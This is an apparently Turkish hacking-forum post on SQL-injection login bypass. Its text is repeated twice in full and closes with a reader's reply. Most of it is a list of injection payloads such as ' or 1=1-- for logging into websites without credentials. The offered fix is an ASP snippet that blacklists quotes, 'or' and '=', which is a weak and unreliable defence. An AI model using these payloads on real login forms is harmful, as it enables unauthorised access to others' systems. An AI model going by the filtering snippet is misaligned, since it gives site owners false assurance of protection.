Başlıyayım Arkadaşlar Hack Olayında da Bypass önemlir ilgim var bu konuya öyle bahsedeyim
Bypass Nedir bunu anlatayım madde halinde
-bu aslında izinsiz komut kullanmak diyebiliriz -izinsiz klasör görme ve -en önemlisi klasörü değiştirmek diyebiliriz
Bir Web sitesine sahipsiniz korktunuz tabi hiiç korkmayın ben size korunma yöntemini aşşağıda vereceğim rahat rahat takılacaksınız
Örnek olarak Login Bypass’ı alacağım.
Login bypass bir sitenin İD şifresini bilmeden Database’ye belirli sorgular göndererek giriş yapmamızı sağlar.
Burda Data Base Data zaten veri bilgi demek hani belirli bilgilere ulaşmak gibi düşünün neyse devam edeyim kodları vereyim artık
admin’--
’ or 0=0 --
’ or ’ 1=1
’ or ’ 1
’ or ’
" or 0=0 --
or 0=0 --
’ or 0=0 **
" or 0=0 **
or 0=0 **
’ or ’x’=’x
" or "x"="x
’) or (’x’=’x
’ or 1=1--
" or 1=1--
or 1=1--
’ or a=a--
" or "a"="a
’) or (’a’=’a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi’ or 1=1 --
hi’ or ’a’=’a
hi’) or (’a’=’a
hi")or("a"="a
Kodlar bildiğim kadar bunlar olması gerekiyor eksik yada yanlış var ise kusura bakmayın arkadaşlar.
haa unuttum şimdi nasıl yapcaz anlatayım
Eğer bunları engellersek bypasstan korunmuş oluruz. ee o kadar bilgi verdin peki nasıl engellicez bunuda anlatayım
İlk önce scriptimize bu kodu yapıştırıyoruz.
pass= request.form("pass")
pass = Replace(pass,"’","’’")
pass = Replace(pass,"or","*")
pass = Replace(pass,"=","*")
Bu kod "or" , " ’ " gibi işaretleri engeller
Arkadaşlar Eksiğim Kusurum Var ise Hakkınızı Helal Edin Umarım Doğru Bir Makale Olmuştur
Bypass Nedir bunu anlatayım madde halinde
-bu aslında izinsiz komut kullanmak diyebiliriz -izinsiz klasör görme ve -en önemlisi klasörü değiştirmek diyebiliriz
Bir Web sitesine sahipsiniz korktunuz tabi hiiç korkmayın ben size korunma yöntemini aşşağıda vereceğim rahat rahat takılacaksınız
Örnek olarak Login Bypass’ı alacağım.
Login bypass bir sitenin İD şifresini bilmeden Database’ye belirli sorgular göndererek giriş yapmamızı sağlar.
Burda Data Base Data zaten veri bilgi demek hani belirli bilgilere ulaşmak gibi düşünün neyse devam edeyim kodları vereyim artık
admin’--
’ or 0=0 --
’ or ’ 1=1
’ or ’ 1
’ or ’
" or 0=0 --
or 0=0 --
’ or 0=0 **
" or 0=0 **
or 0=0 **
’ or ’x’=’x
" or "x"="x
’) or (’x’=’x
’ or 1=1--
" or 1=1--
or 1=1--
’ or a=a--
" or "a"="a
’) or (’a’=’a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi’ or 1=1 --
hi’ or ’a’=’a
hi’) or (’a’=’a
hi")or("a"="a
Kodlar bildiğim kadar bunlar olması gerekiyor eksik yada yanlış var ise kusura bakmayın arkadaşlar.
haa unuttum şimdi nasıl yapcaz anlatayım
Eğer bunları engellersek bypasstan korunmuş oluruz. ee o kadar bilgi verdin peki nasıl engellicez bunuda anlatayım
İlk önce scriptimize bu kodu yapıştırıyoruz.
pass= request.form("pass")
pass = Replace(pass,"’","’’")
pass = Replace(pass,"or","*")
pass = Replace(pass,"=","*")
Bu kod "or" , " ’ " gibi işaretleri engeller
Arkadaşlar Eksiğim Kusurum Var ise Hakkınızı Helal Edin Umarım Doğru Bir Makale Olmuştur
Vur Dedik Öldürdün Ben Basit Herkezin Anlıyabileceği bir dilden anlattım yorumun için saol